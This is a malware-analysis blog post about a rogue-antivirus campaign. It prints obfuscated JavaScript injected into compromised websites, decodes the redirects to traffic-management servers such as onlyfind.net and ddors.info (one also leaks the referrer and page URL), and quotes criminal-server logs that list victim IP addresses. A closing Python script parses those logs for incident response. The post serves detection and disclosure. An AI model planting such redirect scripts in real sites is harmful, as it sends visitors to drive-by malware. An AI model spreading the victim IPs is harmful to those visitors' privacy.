Finjan's Malicious Code Research Center has published a nice report on the rogue antivirus business (redirecting visitors away from legitimate websites). ZDNet article
The report can be found in the latest Cybercrime Intelligence Report.
I just want to show you some of the scripts added to legitimate websites and the logs we found on the criminal web server.
Note that every domain mentioned on this blog (goscanfuse.com, scan6lite.com, scan7new.com, ...) is listed in Google's Safe Browsing API, and each diagnostic reveals a lot of information, e.g. the number of domains used (compromised) and the other domains it works in conjunction with.
We start with the Google Safe Browsing Diagnostic for scanline6.com (report linked in the original post; a screenshot was included in case the live report gets updated).

Now the Google Safe Browsing Diagnostic for three compromised websites:

alfredomcmillanji.awardspace.info
members.lycos.co.uk/cvhkc8xhv/
Malicious script inserted (after the body):
<script> eval(unescape('\%64\%6F\%63\%75\%6D\%65\%6E\%74\%2E\%6C\%6F\%63\%61\%74\%69\%6F\%6E\%3D\%22\%68\%74\%74\%70\%3A\%2F\%2F\%6F\%6E\%6C\%79\%66\%69\%6E\%64\%2E\%6E\%65\%74\%2F\%69\%6E\%2E\%63\%67\%69\%3F\%33\%26\%67\%72\%6F\%75\%70\%3D\%31\%31\%26\%70\%61\%72\%61\%6D\%65\%74\%65\%72\%3D\%6F\%72\%74\%68\%6F\%70\%65\%64\%69\%63\%2B\%70\%68\%79\%73\%69\%63\%61\%6C\%2B\%65\%78\%61\%6D\%69\%6E\%61\%74\%69\%6F\%6E\%22\%3B')) </script>
which forces the browser to redirect to a traffic management server:
document.location="http://onlyfind.net/in.cgi?3&group=11&parameter=orthopedic+physical+examination";
The traffic management server then redirects to a drive-by-download domain, which chooses the next redirection:
onlyfind.net to goscandata.com to scanany6.com
Note: the drive-by-download domain redirects to a new site every day.
On April 6: scanany6.com
On April 7: scan7live.com
On April 8: google.com
On April 9: lite6scan.com
Now the second domain:
Malicious script inserted (after the body):
<script language="JavaScript"> eval(unescape('%70%61%72%65%6E%74%2E%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%22%68%74%74%70%3A%2F%2F%64%64%6F%72%73%2E%69%6E%66%6F%2F%69%6E%2E%63%67%69%3F%31%31%26%6B%65%79%77%6F%72%64%3D%67%61%72%61%67%65%62%61%6E%64%2B%68%61%72%64%2B%72%6F%63%6B%2B%67%75%69%74%61%72%2B%61%70%70%6C%65%2B%6C%6F%6F%70%73%26%73%65%6F%72%65%66%3D%22%2B%65%6E%63%6F%64%65%55%52%49%43%6F%6D%70%6F%6E%65%6E%74%28%64%6F%63%75%6D%65%6E%74%2E%72%65%66%65%72%72%65%72%29%2B%22%26%22%2B%22%70%61%72%61%6D%65%74%65%72%3D%24%6B%65%79%77%6F%72%64%26%6B%65%79%77%6F%72%64%3D%24%6B%65%79%77%6F%72%64%26%73%65%3D%24%73%65%26%75%72%3D%31%26%48%54%54%50%5F%52%45%46%45%52%45%52%3D%22%2B%65%6E%63%6F%64%65%55%52%49%43%6F%6D%70%6F%6E%65%6E%74%28%64%6F%63%75%6D%65%6E%74%2E%55%52%4C%29%29')) </script>
which forces the browser to redirect to another traffic management server:
parent.window.location.replace("http://ddors.info/in.cgi?11&keyword=garageband+hard+rock+guitar+apple+loops&seoref="+encodeURIComponent(document.referrer)+"&"+"parameter=$keyword&keyword=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL))
The traffic management server then redirects to a drive-by-download domain, which chooses the next redirection:
ddors.info to goscandata.com to scanany6.com
Note that during the redirection the traffic management server learns your IP address and the site that served the redirection (the compromised website), since the script passes document.referrer and document.URL along in the query string.
Interestingly, the site serving the first redirection has been listed in the Malware Domain List since May 2008 for hosting a Zlob variant!
*******
What we found on the server:
1 1 0 0 0 0 0 0 US en-us 65.55.165.94 http%3A%2F%2Ftiti%2Eiax%2Ebe%2Fdiagnostic%2Dteaching%2Dof%2Dreading%2Dand%2Djournal%2Darticles%2Ehtml%3Ffeed%3Dcomments%2Drss2 articles live%2Ecom Mozilla%2F4%2E0+%28compatible%3B+MSIE+6%2E0%3B+Windows+NT+5%2E2%3B
1 1 0 0 1 1 1 0 GB en-gb 86.147.111.244 http%3A%2F%2Fhome%2Eno%2Fchuka%2Fwicapeadea%2Ehtml wickapeadea yahoo Mozilla%2F4%2E0+%28compatible%3B+MSIE+7%2E0%3B+Windows+NT+5%2E1%3B
1 1 0 0 1 1 1 0 US en-us 72.11.87.126 http%3A%2F%2Ftiti%2Eiax%2Ebe%2Faia%2Dbilling%2Dform%2Ehtml aia+billing+form msn Mozilla%2F4%2E0+%28compatible%3B+MSIE+7%2E0%3B+Windows+NT+5%2E1%3B
Each record holds the visitor's IP address (and country), browser version and language, and the referring site, which is the compromised website.
I will not publish the entire log because a LOT of compromised websites are cited. (We also have logs from other servers, megabytes in size, which include thousands of compromised websites.)
Here are some of them:
1 1 0 0 0 0 0 0 US en-us 65.55.165.94 hxxp://titi.iax.be/diagnostic-teaching-of-reading-and-journal-articles.html?feed=comments-rss2 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2;)
1 1 0 0 1 1 1 0 GB en-gb 86.147.111.244 hxxp://home.no/chuka/wicapeadea.html Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;)
1 1 0 0 1 1 1 0 US en-us 72.11.87.126 hxxp://titi.iax.be/aia-billing-form.html Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;)
4 1 1 0 0 0 0 0 FR en-us 193.47.80.77 hxxp://mitglied.lycos.de/gbk6ntkbn/usda-maps-mn.html keyword for traffic: usda maps mn
4 1 1 0 0 0 0 0 US en-us 204.62.53.124 hxxp://members.lycos.co.uk/dkd1nfkdf/voodoo-glow-skulls-guitar-tabs.html keyword for traffic: voodoo glow skulls guitar tabs
4 1 0 0 0 0 0 0 IE en-us 78.137.163.133 hxxp://usuarios.lycos.es/utrinopok/remove-hair-dye-stains.html keyword for traffic: remove hair dye stains
4 1 0 0 1 1 1 0 US en-us 71.235.179.148 hxxp://members.lycos.nl/eu40wyhk/presentation-tools-for-excel-highlighting.html keyword for traffic: presentation tools for excel highlighting
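The raw records above are space-separated and URL-encoded, and the page prints them run together, so the last user-agent field of one record butts up against the eight flag fields of the next. The script below is an added example, not the post's or the criminal server's own tooling: it splits the glued stream back into records, decodes each field, and produces the two things a responder wants first from such a log, the list of compromised referring sites to notify and a breakdown of victims by country and search engine. The meaning of the eight leading numeric flags is not given in the post, so they are kept as opaque integers; the sample input is the three raw records quoted above, and the field names are my assumptions.

```python
"""Parse the URL-encoded TDS log records quoted in the post and summarise them.

Added example (not from the post); field names are assumptions, the eight
leading flags are kept as opaque integers because the post does not explain them.
"""
import re
from collections import Counter
from urllib.parse import unquote, unquote_plus, urlsplit

# Constructed input: the three records shown in the post, joined exactly as the
# page prints them (records run together with no separator between them).
RAW_LOG = (
    "1 1 0 0 0 0 0 0 US en-us 65.55.165.94 http%3A%2F%2Ftiti%2Eiax%2Ebe%2Fdiagnostic"
    "%2Dteaching%2Dof%2Dreading%2Dand%2Djournal%2Darticles%2Ehtml%3Ffeed%3Dcomments"
    "%2Drss2 articles live%2Ecom Mozilla%2F4%2E0+%28compatible%3B+MSIE+6%2E0%3B+"
    "Windows+NT+5%2E2%3B"
    "1 1 0 0 1 1 1 0 GB en-gb 86.147.111.244 http%3A%2F%2Fhome%2Eno%2Fchuka%2F"
    "wicapeadea%2Ehtml wickapeadea yahoo Mozilla%2F4%2E0+%28compatible%3B+MSIE+7%2E0"
    "%3B+Windows+NT+5%2E1%3B"
    "1 1 0 0 1 1 1 0 US en-us 72.11.87.126 http%3A%2F%2Ftiti%2Eiax%2Ebe%2Faia"
    "%2Dbilling%2Dform%2Ehtml aia+billing+form msn Mozilla%2F4%2E0+%28compatible%3B"
    "+MSIE+7%2E0%3B+Windows+NT+5%2E1%3B"
)

# One record: 8 flags, country, language, IP, referrer, keyword, search engine,
# user agent. The user agent is matched lazily up to the next record's flag
# block, a whitespace character, or end of input, so glued and newline-separated
# streams both parse.
RECORD = re.compile(
    r"(?P<flags>(?:\d ){8})"
    r"(?P<country>[A-Z]{2}) (?P<lang>[a-z]{2}-[a-z]{2}) "
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) "
    r"(?P<referrer>\S+) (?P<keyword>\S+) (?P<engine>\S+) "
    r"(?P<ua>\S+?)"
    r"(?=(?:\d ){8}[A-Z]{2} |\s|$)"
)


def parse_records(raw: str) -> list[dict]:
    """Split the raw stream into records and URL-decode every field."""
    records = []
    for m in RECORD.finditer(raw):
        referrer = unquote(m["referrer"])
        records.append({
            "flags": [int(x) for x in m["flags"].split()],  # meaning unknown
            "country": m["country"],
            "lang": m["lang"],
            "ip": m["ip"],
            "referrer": referrer,                      # the compromised page
            "referrer_host": urlsplit(referrer).hostname,
            "keyword": unquote_plus(m["keyword"]),     # '+' encodes a space here
            "engine": unquote(m["engine"]),
            "user_agent": unquote_plus(m["ua"]),
        })
    return records


def summarize(records: list[dict]) -> dict:
    """What a responder wants first: which sites to notify and who was hit."""
    return {
        "compromised_hosts": sorted({r["referrer_host"] for r in records}),
        "visitors_by_country": dict(Counter(r["country"] for r in records)),
        "search_engines": dict(Counter(r["engine"] for r in records)),
        "victim_ips": [r["ip"] for r in records],
    }


if __name__ == "__main__":
    recs = parse_records(RAW_LOG)
    for r in recs:
        print(f'{r["country"]} {r["ip"]} <- {r["referrer"]} [{r["engine"]}: {r["keyword"]}]')
    print(summarize(recs))
```

The compromised-host list is the actionable output: those are the site owners to contact, while the victim IPs and the keyword/engine pairs tell you how the traffic was being sourced (search-engine poisoning on long-tail queries, as the "keyword for traffic" lines above show).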